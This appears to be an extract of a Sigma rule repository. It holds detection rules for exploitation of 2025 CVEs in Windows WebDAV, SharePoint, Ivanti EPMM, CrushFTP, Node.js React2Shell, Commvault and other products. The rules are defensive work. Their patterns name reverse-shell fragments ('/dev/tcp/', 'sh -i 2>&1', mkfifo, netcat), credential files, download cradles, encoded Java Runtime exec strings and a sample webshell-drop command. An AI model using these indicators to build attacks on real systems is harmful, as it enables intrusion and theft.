    "content": "title: Potential Exploitation of RCE Vulnerability CVE-2025-33053 - Image Load\nid: 04fc4b22-91a6-495a-879d-0144fec5ec03\nrelated:\n    - id: abe06362-a5b9-4371-8724-ebd00cd48a04\n      type: similar\n    - id: 9a2d8b3e-f5a1-4c68-9e21-7d9e1cf8a123\n      type: similar\nstatus: experimental\ndescription: |\n    Detects potential exploitation of remote code execution vulnerability CVE-2025-33053\n    by monitoring suspicious image loads from WebDAV paths. The exploit involves malicious executables from\n    attacker-controlled WebDAV servers loading the Windows system DLLs like gdi32.dll, netapi32.dll, etc.\nreferences:\n    - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33053\n    - https://research.checkpoint.com/2025/stealth-falcon-zero-day/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-06-13\ntags:\n    - attack.command-and-control\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.lateral-movement\n    - attack.t1105\n    - detection.emerging-threats\n    - cve.2025-33053\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection_img_path:\n        Image|startswith: '\\\\\\\\'\n        Image|contains: '\\DavWWWRoot\\'\n    selection_img_bin:\n        Image|endswith:\n            - '\\route.exe'\n            - '\\netsh.exe'\n            - '\\makecab.exe'\n            - '\\dxdiag.exe'\n            - '\\ipconfig.exe'\n            - '\\explorer.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-33053/proc_access_win_exploit_cve_2025_33053.yml",
    "content": "title: Potential Exploitation of RCE Vulnerability CVE-2025-33053 - Process Access\nid: 9a2d8b3e-f5a1-4c68-9e21-7d9e1cf8a123\nrelated:\n    - id: abe06362-a5b9-4371-8724-ebd00cd48a04\n      type: similar\n    - id: 04fc4b22-91a6-495a-879d-0144fec5ec03\n      type: similar\nstatus: experimental\ndescription: |\n    Detects potential exploitation of remote code execution vulnerability CVE-2025-33053\n    by looking for process access that involves legitimate Windows executables (iediagcmd.exe, CustomShellHost.exe)\n    accessing suspicious executables hosted on WebDAV shares. This indicates an attacker may be exploiting\n    Process.Start() search order manipulation to execute malicious code from attacker-controlled WebDAV servers\n    instead of legitimate system binaries. The vulnerability allows unauthorized code execution through\n    external control of file names or paths via WebDAV.\nreferences:\n    - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33053\n    - https://research.checkpoint.com/2025/stealth-falcon-zero-day/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-06-13\ntags:\n    - attack.command-and-control\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.lateral-movement\n    - attack.t1105\n    - detection.emerging-threats\n    - cve.2025-33053\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection_src:\n        SourceImage:\n            - 'C:\\Program Files\\internet explorer\\iediagcmd.exe'\n            - 'C:\\Windows\\System32\\CustomShellHost.exe'\n    selection_target_dir:\n        - TargetImage|startswith: '\\\\\\\\'\n        - TargetImage|contains: '\\DavWWWRoot\\'\n    selection_target_exe:\n        TargetImage|endswith:\n            - '\\route.exe'\n            - '\\netsh.exe'\n            - '\\makecab.exe'\n            - '\\dxdiag.exe'\n            - '\\ipconfig.exe'\n            - '\\explorer.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-33053/proc_creation_win_exploit_cve_2025_33053.yml",
    "content": "title: Potential Exploitation of RCE Vulnerability CVE-2025-33053\nid: abe06362-a5b9-4371-8724-ebd00cd48a04\nrelated:\n    - id: 9a2d8b3e-f5a1-4c68-9e21-7d9e1cf8a123\n      type: similar\n    - id: 04fc4b22-91a6-495a-879d-0144fec5ec03\n      type: similar\nstatus: experimental\ndescription: |\n    Detects potential exploitation of remote code execution vulnerability CVE-2025-33053\n    which involves unauthorized code execution via WebDAV through external control of file names or paths.\n    The exploit abuses legitimate utilities like iediagcmd.exe or CustomShellHost.exe  by manipulating\n    their working directories to point to attacker-controlled WebDAV servers, causing them to execute\n    malicious executables (like route.exe) from the WebDAV path instead of legitimate system binaries\n    through Process.Start() search order manipulation.\nreferences:\n    - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33053\n    - https://research.checkpoint.com/2025/stealth-falcon-zero-day/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-06-13\ntags:\n    - attack.command-and-control\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.lateral-movement\n    - attack.t1105\n    - detection.emerging-threats\n    - cve.2025-33053\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage:\n            - 'C:\\Program Files\\internet explorer\\iediagcmd.exe'\n            - 'C:\\Windows\\System32\\CustomShellHost.exe'\n    selection_child_current_dir:\n        - CurrentDirectory|startswith: '\\\\\\\\'\n        - CurrentDirectory|contains: '\\DavWWWRoot\\'\n        - Image|contains: '\\DavWWWRoot\\'\n        - Image|startswith: '\\\\\\\\'\n    selection_child_img:\n        Image|endswith:\n            - '\\route.exe'\n            - '\\netsh.exe'\n            - '\\makecab.exe'\n            - '\\dxdiag.exe'\n            - '\\ipconfig.exe'\n            - '\\explorer.exe'\n    filter_main_system:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-40551/proc_creation_win_exploit_cve_2025_40551.yml",
    "content": "title: Suspicious Child Process of SolarWinds WebHelpDesk\nid: 8c7f4a2d-3b9e-4f1c-9a6d-2e8f5c3d9a1b\nstatus: experimental\ndescription: |\n    Detects suspicious child processes spawned by SolarWinds WebHelpDesk (WHD) application, which may indicate exploitation activity leveraging RCE vulnerabilities such as CVE-2025-40551, CVE-2025-40536, or CVE-2025-26399\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2026/02/06/active-exploitation-solarwinds-web-help-desk/\n    - https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399\n    - https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm\nauthor: Huntress Team, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2026-02-11\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2025-26399\n    - cve.2025-40536\n    - cve.2025-40551\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|contains: '\\WebHelpDesk\\bin\\'\n        ParentImage|endswith:\n            - '\\java.exe'\n            - '\\javaw.exe'\n        ParentCommandLine|contains: 'tomcat'\n    selection_suspicious_child:\n        CommandLine|contains:\n            - '-enc'\n            - 'base64'\n            - 'bitsadmin'\n            - 'certutil'\n            - 'curl'\n            - 'Invoke-RestMethod'\n            - 'Invoke-WebRequest'\n            - 'irm '\n            - 'iwr '\n            - 'mshta'\n            - 'msiexec'\n            - 'Net.WebClient'\n            - 'Start-BitsTransfer'\n            - 'wget'\n            - 'wmic'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-4427/web_invanti_epmm_cve_2025_4427_and_cve_2025_4428.yml",
    "content": "title: Potential Exploitation of CVE-2025-4427/4428 Ivanti EPMM Pre-Auth RCE\nid: 41956f7c-7a6b-46d6-b6bb-da6eb2e83fbe\nstatus: experimental\ndescription: |\n    Detects potential exploitation of a chained vulnerability attack targeting Ivanti EPMM 12.5.0.0.\n    CVE-2025-4427 allows unauthenticated access to protected API endpoints via an authentication bypass,\n    which can then be leveraged to trigger CVE-2025-4428 — a remote code execution vulnerability through\n    template injection. This sequence enables unauthenticated remote code execution, significantly increasing\n    the impact of exploitation.\nreferences:\n    - https://labs.watchtowr.com/expression-payloads-meet-mayhem-cve-2025-4427-and-cve-2025-4428/?123\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-05-20\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.execution\n    - attack.t1203\n    - cve.2025-4427\n    - cve.2025-4428\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_uri:\n        cs-uri-stem|contains: '/mifs/rs/api/v2/featureusage'\n        cs-uri-query|contains: 'format='\n    selection_exploit_rce:\n        - cs-uri-query|contains|all:\n              - 'java.lang.Runtime'\n              - '.getMethod'\n              - 'getRuntime'\n              - '.exec('\n        - cs-uri-query|contains|all:\n              - 'java%2elang%2eRuntime' # java.lang.Runtime\n              - '%2egetMethod' # .getMethod\n              - '%2eexec%28' # .exec(\n        - cs-uri-query|contains:\n              - '%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%65%28%29' # java.lang.Runtime\n              - '%67%65%74%52%75%6e%74%69%6d%65' # getRuntime\n              - '%2e%65%78%65%63%28' # .exec(\n    selection_exploit_template_injection:\n        cs-uri-query|contains:\n            - '{7*7}'\n            - '%7B7*7%7D'\n            - '%7b7%2a7%7d'\n    condition: selection_uri and 1 of selection_exploit_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-49144/proc_creation_win_exploit_cve_2025_49144.yml",
    "content": "title: Potential Notepad++ CVE-2025-49144 Exploitation\nid: 933f0bb5-0681-4fe7-8a17-4e6cccbaac44\nstatus: experimental\ndescription: |\n    Detects potential exploitation of CVE-2025-49144, a local privilege escalation vulnerability in Notepad++ installers (v8.8.1 and prior) where the installer calls regsvr32.exe without specifying the full path.\n    This allows an attacker to execute arbitrary code with elevated privileges by placing a malicious regsvr32.exe alongside this Legitimate Notepad++ installer.\n    The vulnerability is triggered when the installer attempts to register the NppShell.dll file, which is a component of Notepad++.\nreferences:\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-49144\n    - https://x.com/NullSecurityX/status/1937444064867029179\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-06-26\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1574.008\n    - cve.2025-49144\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '\\regsvr32.exe'\n        CommandLine|startswith: 'regsvr32 /s'\n        CommandLine|contains: '\\contextMenu\\NppShell.dll'\n    filter_main_legit_regsvr32:\n        Image:\n            - 'C:\\Windows\\System32\\regsvr32.exe'\n            - 'C:\\Windows\\SysWOW64\\regsvr32.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-53770/file_event_win_exploit_cve_2025_53770.yml",
    "content": "title: Potential SharePoint ToolShell CVE-2025-53770 Exploitation - File Create\nid: ba479447-721f-42a9-9af2-6dcd517bbdb3\nstatus: experimental\ndescription: |\n    Detects the creation of file such as spinstall0.aspx which may indicate successful exploitation of CVE-2025-53770.\n    CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution.\nreferences:\n    - https://research.eye.security/sharepoint-under-siege/\n    - https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/\n    - https://unit42.paloaltonetworks.com/microsoft-sharepoint-cve-2025-49704-cve-2025-49706-cve-2025-53770/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-07-21\nmodified: 2025-07-24\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2025-53770\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|startswith:\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\'\n            - 'C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Web Server Extensions\\'\n        TargetFilename|contains:\n            - '\\15\\TEMPLATE\\LAYOUTS\\'\n            - '\\16\\TEMPLATE\\LAYOUTS\\'\n        TargetFilename|endswith:\n            - '\\spinstall.aspx'\n            - '\\spinstall?.aspx'\n            - '\\debug_dev.js'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-53770/proc_creation_win_exploit_cve_2025_53770_indicators.yml",
    "content": "title: Potential SharePoint ToolShell CVE-2025-53770 Exploitation Indicators\nid: 7477881c-ec3b-49d6-aced-7255944e5c59\nstatus: experimental\ndescription: |\n    Detects potential exploitation of CVE-2025-53770 by identifying indicators such as suspicious command lines discovered in Post-Exploitation activities.\n    CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution.\nreferences:\n    - https://research.eye.security/sharepoint-under-siege/\n    - https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-07-21\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2025-53770\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        ParentImage|endswith: '\\w3wp.exe'\n    selection_encoded_aspx:\n        - CommandLine|wide|base64offset|contains: 'spinstall0.aspx'\n        - CommandLine|base64|contains: 'spinstall0.aspx'\n    selection_encoded_path:\n        CommandLine|wide|base64offset|contains:\n            - ':\\PROGRA~1\\COMMON~1\\MICROS~1\\WEBSER~1\\15\\TEMPLATE\\LAYOUTS'\n            - ':\\PROGRA~1\\COMMON~1\\MICROS~1\\WEBSER~1\\16\\TEMPLATE\\LAYOUTS'\n            - ':\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\15\\TEMPLATE\\LAYOUTS'\n            - ':\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\16\\TEMPLATE\\LAYOUTS'\n    selection_ioc:\n        CommandLine|contains:\n            - '-EncodedCommand JABiAGEAcwBlADYANABTAHQAcgBpAG4AZwAgAD0'\n            - 'TEMPLATE\\LAYOUTS\\spinstall0.aspx'\n    condition: (selection_img and 1 of selection_encoded_*) or selection_ioc\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-53770/web_win_iis_exploit_cve_2025_53770.yml",
    "content": "title: SharePoint ToolShell CVE-2025-53770 Exploitation - Web IIS\nid: 48d053db-6a56-4866-b60d-0975647050ed\nstatus: experimental\ndescription: |\n    Detects access to vulnerable SharePoint components potentially being exploited in CVE-2025-53770 through IIS web server logs.\n    CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution.\nreferences:\n    - https://www.linkedin.com/posts/mauricefielenbach_sharepoint-incidentresponse-windowssecurity-activity-7352653907363303425-bL2f\n    - https://research.eye.security/sharepoint-under-siege/\n    - https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-07-21\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2025-53770\n    - detection.emerging-threats\nlogsource:\n    category: webserver # IIS web server logs\ndetection:\n    selection_exploit_post:\n        cs-method: 'POST'\n        cs-uri-stem|contains: '/_layouts/15/ToolPane.aspx'\n        cs-uri-query|contains: 'DisplayMode=Edit&a=/ToolPane.aspx'\n    selection_exploit_get:\n        cs-method: 'GET'\n        cs-uri-stem|contains: '/_layouts/15/spinstall0.aspx'\n    selection_referer:\n        cs-referer|contains: '/_layouts/SignOut.aspx'\n    condition: 1 of selection_exploit_* and selection_referer\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-54309/proc_creation_win_exploit_cve_2025_54309.yml",
    "content": "title: Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309)\nid: 0fdc7c7f-c690-4217-9ae3-31f5156eed72\nstatus: experimental\ndescription: Detects suspicious child processes created by CrushFTP. It could be an indication of exploitation of a RCE vulnerability such as CVE-2025-54309.\nreferences:\n    - https://reliaquest.com/blog/threat-spotlight-cve-2025-54309-crushftp-exploit/\n    - https://pwn.guide/free/web/crushftp\n    - https://firecompass.com/crushftp-vulnerability-cve-2025-54309-securing-file-transfer-services/\nauthor: Nisarg Suthar\ndate: 2025-08-01\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1059.003\n    - attack.t1068\n    - attack.t1190\n    - cve.2025-54309\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\crushftp.exe'\n    selection_child_powershell:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains|all:\n            - 'IEX'\n            - 'enc'\n            - 'Hidden'\n            - 'bypass'\n    selection_child_cmd:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains:\n            - '/c powershell'\n            - 'whoami'\n            - 'net.exe'\n            - 'net1.exe'\n    selection_child_others:\n        Image|endswith:\n            - '\\bitsadmin.exe'\n            - '\\certutil.exe'\n            - '\\mshta.exe'\n            - '\\cscript.exe'\n            - '\\wscript.exe'\n    condition: selection_parent and 1 of selection_child_*\nfalsepositives:\n    - Legitimate administrative command execution\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-55182/proc_creation_lnx_exploit_cve_2025_55182_susp_nodejs_server_child_process.yml",
    "content": "title: Linux Suspicious Child Process from Node.js - React2Shell\nid: c70834fa-fb9d-4aa0-9e7d-45ceed36f3f7\nrelated:\n    - id: 271de298-cc0e-4842-acd8-079a0a99ea65\n      type: similar\nstatus: experimental\ndescription: |\n    Detects suspicious child processes spawned from Node.js server processes on Linux systems, potentially indicating remote code execution exploitation such as CVE-2025-55182 (React2Shell).\n    This rule particularly looks for exploitation of vulnerability on Node.js Servers where attackers abuse Node.js child_process module to execute arbitrary system commands.\n    When execSync() or exec() is used, the command line often includes a shell invocation followed by suspicious commands or scripts (e.g., /bin/sh -c <malicious-command>).\n    For other methods, the Image field will show the spawned process directly.\nreferences:\n    - https://github.com/msanft/CVE-2025-55182\n    - https://nodejs.org/api/child_process.html#class-childprocess\n    - https://gist.github.com/swachchhanda000/a0228130f86a2dedfbcebb415b47f870\n    - https://github.com/nasbench/Misc-Research/blob/2f651ede832ab34027a7ba005b63bb78f1ade378/Other/React-Next-Child-Processes-Notes.md\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems), Nasreddine Bencherchali\ndate: 2025-12-05\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\n    - cve.2025-55182\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_parent:\n        ParentImage|endswith: '/node'\n        ParentCommandLine|contains:\n            - '--experimental-https'\n            - '--experimental-next-config-strip-types'\n            - '/node_modules/next'\n            - 'next dev'\n            - 'next start'\n            - 'node_modules/.bin'\n            - 'react-scripts start'\n            - 'start-server.js'\n    selection_generic_child_img:\n        # Observed when child_process.spawn(), child_process.exec(), child_process.execFile(), or child_process.fork() method is used to spawn suspicious processes in exploit\n        - Image|endswith:\n              - '/busybox'\n              - '/cat'\n              - '/curl'\n              - '/dash'\n              - '/dig'\n              - '/head'\n              - '/id'\n              - '/ifconfig'\n              - '/ip'\n              - '/java'\n              - '/less'\n              - '/lua'\n              - '/more'\n              - '/nc'\n              - '/ncat'\n              - '/netcat'\n              - '/netstat'\n              - '/nslookup'\n              - '/perl'\n              - '/ping'\n              - '/python'\n              - '/python2'\n              - '/ruby'\n              - '/socat'\n              - '/tail'\n              - '/wget'\n              - '/whoami'\n        - Image|contains: '/python'\n    selection_generic_child_cli:\n        # Observed when child_process.execSync() is used to spawn suspicious processes\n        # Reference: https://nodejs.org/api/child_process.html#child_processexecsynccommand-options\n        # By default, the cli will look something like `/bin/sh -c .......`\n        CommandLine|contains:\n            - '/dev/tcp/'\n            - '/dev/udp/'\n            - '/etc/hosts'\n            - '/etc/passwd'\n            - '/etc/shadow'\n            - 'base64'\n            - 'cat '\n            - 'curl'\n            - 'dig'\n            - 'ifconfig'\n            - 'IO::Socket::INET'\n            - 'java'\n            - 'less '\n            - 'lua'\n            - 'mkfifo '\n            - 'more'\n            - 'nc '\n            - 'ncat'\n            - 'netcat'\n            - 'netstat'\n            - 'nslookup'\n            - 'perl'\n            - 'php'\n            - 'ping'\n            - 'ps -ef'\n            - 'ps aux'\n            - 'python'\n            - 'rcat'\n            - 'ruby'\n            - 'sh -i 2>&1'\n            - '-c id'\n            - 'socat'\n            - 'uname'\n            - 'wget'\n            - 'whoami'\n    selection_specific_sh:\n        Image|endswith: '/sh'\n    selection_specific_cli:\n        Image|endswith: '-c'\n    filter_main_default_shell_flag:\n        Image|endswith: '-c'\n    condition:\n        selection_parent and\n        (\n            1 of selection_generic_*\n            or\n            (selection_specific_sh and not filter_main_default_shell_flag)\n            or\n            (all of selection_specific_* and selection_generic_child_cli)\n        )\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-55182/proc_creation_win_exploit_cve_2025_55182_susp_nodejs_server_child_process.yml",
    "content": "title: Windows Suspicious Child Process from Node.js - React2Shell\nid: 271de298-cc0e-4842-acd8-079a0a99ea65\nrelated:\n    - id: c70834fa-fb9d-4aa0-9e7d-45ceed36f3f7\n      type: similar\nstatus: experimental\ndescription: |\n    Detects suspicious child processes started by Node.js server processes on Windows, which may indicate exploitation of vulnerabilities like CVE-2025-55182 (React2Shell).\n    Attackers can abuse the Node.js 'child_process' module to run system commands or scripts using methods such as spawn(), exec(), execFile(), fork(), or execSync().\n    If execSync() or exec() is used in the exploit, the command line often shows a shell (e.g., cmd.exe /d /s /c ...) running a suspicious command unless other shells are explicitly invoked.\n    For other methods, the spawned process appears directly in the Image field unless a shell is explicitly used.\nreferences:\n    - https://github.com/msanft/CVE-2025-55182\n    - https://nodejs.org/api/child_process.html#class-childprocess\n    - https://gist.github.com/swachchhanda000/a0228130f86a2dedfbcebb415b47f870\n    - https://github.com/nasbench/Misc-Research/blob/2f651ede832ab34027a7ba005b63bb78f1ade378/Other/React-Next-Child-Processes-Notes.md\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems), Nasreddine Bencherchali\ndate: 2025-12-05\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\n    - cve.2025-55182\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\node.exe'\n        ParentCommandLine|contains:\n            - '--experimental-https'\n            - '--experimental-next-config-strip-types'\n            - '\\node_modules\\next'\n            - 'next dev'\n            - 'next start'\n            - 'next\" start'\n            - 'node_modules\\\\.bin\\\\\\\\..\\\\next' # We escape every backslash to avoid confusion\n            - 'react-scripts start'\n            - 'start-server.js'\n    selection_generic_child_img:\n        # Observed when child_process.spawn(), child_process.exec(), child_process.execFile(), or child_process.fork() method  is used to spawn suspicious processes\n        - Image|endswith:\n              - '\\bash.exe'\n              - '\\bitsadmin.exe'\n              - '\\certutil.exe'\n              - '\\cscript.exe'\n              - '\\curl.exe'\n              - '\\ipconfig.exe'\n              - '\\mshta.exe'\n              - '\\net.exe'\n              - '\\net1.exe'\n              - '\\netsh.exe'\n              - '\\nslookup.exe'\n              - '\\OpenConsole.exe'\n              - '\\perl.exe'\n              - '\\ping.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\py.exe'\n              - '\\python.exe'\n              - '\\pythonw.exe'\n              - '\\pyw.exe'\n              - '\\reg.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\sc.exe'\n              - '\\sh.exe'\n              - '\\systeminfo.exe'\n              - '\\wget.exe'\n              - '\\whoami.exe'\n              - '\\wmic.exe'\n              - '\\wscript.exe'\n              - '\\wt.exe'\n        - Image|contains: '\\python'\n    selection_generic_child_cli_susp_pattern:\n        # Observed when child_process.execSync() is used to spawn suspicious processes\n        # Reference: https://nodejs.org/api/child_process.html#child_processexecsynccommand-options\n        # In default, the cli will look something like `C:\\WINDOWS\\System32\\cmd.exe /d /s /c \"...susp..cli....\"`\n        CommandLine|contains:\n            - '\\net'\n            - 'bitsadmin'\n            - 'certutil '\n            - 'conhost --headless'\n            - 'cscript '\n            - 'curl'\n            - 'ipconfig'\n            - 'java'\n            - 'lua'\n            - 'mshta'\n            - 'netsh'\n            - 'nslookup '\n            - 'perl'\n            - 'ping '\n            - 'powershell'\n            - 'pwsh'\n            - 'python'\n            - 'reg '\n            - 'reg.exe'\n            - 'regsvr32'\n            - 'ruby'\n            - 'rundll32'\n            - 'sc.exe'\n            - 'systeminfo'\n            - 'wget'\n            - 'whoami'\n            - 'wmic'\n            - 'wscript'\n    selection_specific_cmd:\n        Image|endswith: '\\cmd.exe'\n    selection_specific_cli:\n        CommandLine|contains: '/d /s /c '\n    filter_main_default_shell_flag:\n        CommandLine|contains: '/d /s /c '\n    filter_main_cli_git:\n        CommandLine|contains: 'git config --local --get remote.origin.url'\n    filter_main_cli_netstat:\n        CommandLine|contains|all:\n            - 'netstat -ano | findstr /C:'\n            - ' | findstr LISTENING'\n    filter_main_cli_mkcert_install:\n        CommandLine|contains|all:\n            - '\\mkcert\\'\n            - ' -install '\n    filter_main_cli_mkcert_caroot:\n        CommandLine|contains|all:\n            - '\\mkcert\\'\n            - ' -CAROOT'\n    condition:\n        selection_parent and\n        (\n            1 of selection_generic_*\n            or\n            (selection_specific_cmd and not filter_main_default_shell_flag)\n            or\n            (all of selection_specific_* and not 1 of filter_main_cli_*)\n        )\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules-emerging-threats/2025/Exploits/CVE-2025-55182/proc_creation_win_exploit_cve_2025_55182_susp_nodejs_server_child_process/info.yml\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-57788/proc_creation_win_exploit_cve_2025_57788.yml",
    "content": "title: Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788)\nid: 917789e1-2c1f-4bf5-8c91-6f71a017f469\nstatus: experimental\ndescription: |\n    Detects a qlogin.exe command attempting to authenticate as the internal `_+_PublicSharingUser_` using a GUID as the password.\n    This could be an indicator of an attacker exploiting CVE-2025-57788 to gain initial access using leaked credentials.\nreferences:\n    - https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-20\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078.001\n    - detection.emerging-threats\n    - cve.2025-57788\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'qlogin'\n            - '_+_PublicSharingUser_'\n        # Detects the use of a GUID as the password, which is indicative of an exploit attempt\n        CommandLine|re: '[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative scripts that use the `_+_PublicSharingUser_` account for valid purposes.\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-57790/proc_creation_win_exploit_cve_2025_57790.yml",
    "content": "title: Commvault QOperation Path Traversal Webshell Drop (CVE-2025-57790)\nid: bd3b3fff-a018-4994-9876-68af5809160f\nstatus: experimental\ndescription: |\n    Detects the use of qoperation.exe with the -file argument to write a JSP file to the webroot, indicating a webshell drop.\n    This is a post-authentication step corresponding to CVE-2025-57790.\nreferences:\n    - https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-20\ntags:\n    - attack.persistence\n    - attack.t1505.003\n    - detection.emerging-threats\n    - cve.2025-57790\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # qoperation execute -af F:\\Program Files\\Commvault\\ContentStore\\Reports\\MetricsUpload\\Upload\\ABC1234\\rekt.xml -file F:\\Program Files\\Commvault\\ContentStore\\Apache\\webapps\\ROOT\\wT-poc.jsp\n        CommandLine|contains|all:\n            - 'qoperation'\n            - 'exec'\n            - ' -af '\n            - '.xml '\n            - '\\Apache\\webapps\\ROOT\\'\n            - '.jsp'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-57791/proc_creation_win_exploit_cve_2025_57791.yml",
